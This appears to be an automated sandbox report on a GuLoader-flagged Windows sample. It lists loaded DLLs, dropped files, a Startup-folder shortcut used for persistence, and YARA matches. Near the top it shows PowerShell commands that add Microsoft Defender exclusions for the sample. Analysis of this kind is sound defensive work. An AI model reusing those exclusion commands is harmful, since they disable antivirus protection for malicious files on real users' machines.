        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\yVVZdG2NJX.exe'Jump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'yVVZdG2NJX.exe'Jump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\yVVZdG2NJX.exe'Jump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: oleacc.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: shfolder.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: riched20.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: usp10.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: msls31.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: slc.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: scrrun.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: linkinfo.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: ntshrui.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: cscapi.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: avicap32.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: msvfw32.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
        Source: yVVZdG2NJX.lnk.3.drLNK file: ..\..\..\..\..\yVVZdG2NJX.exe
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
        Source: yVVZdG2NJX.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

        Data Obfuscation

        barindex
        Yara detected GuLoader
        Source: Yara matchFile source: 00000000.00000002.1555288349.0000000004473000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.1554696495.00000000008BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: yVVZdG2NJX.exe PID: 8068, type: MEMORYSTR
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeCode function: 0_2_703D1B63 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_703D1B63
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeCode function: 0_2_703D2FD0 push eax; ret 0_2_703D2FFE
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_02D96348 push eax; ret 5_2_02D96351
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0352632D push eax; ret 8_2_03526341
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_03527A10 pushfd ; retf 8_2_03527A12
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_03527A09 pushfd ; retf 8_2_03527A0A
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_03523A9C push ebx; retf 8_2_03523ADA
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_03523D18 push eax; retf 8_2_03523D1A
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_03523D30 push edx; retf 8_2_03523D32
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_03523D38 push edx; retf 8_2_03523D3A
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_07D84990 pushad ; retf 8_2_07D84991
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_04A81298 push ebx; iretd 10_2_04A8131A
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_04A86348 push eax; ret 10_2_04A86351
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_04A80C55 push edi; iretd 10_2_04A80C62
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeFile created: C:\Users\user\AppData\Roaming\yVVZdG2NJX.exeJump to dropped file
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeFile created: C:\Users\user\AppData\Local\Temp\nsg9061.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\yVVZdG2NJX.lnkJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\yVVZdG2NJX.lnkJump to behavior

        Hooking and other Techniques for Hiding and Protection

        barindex
        Loading BitLocker PowerShell Module
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
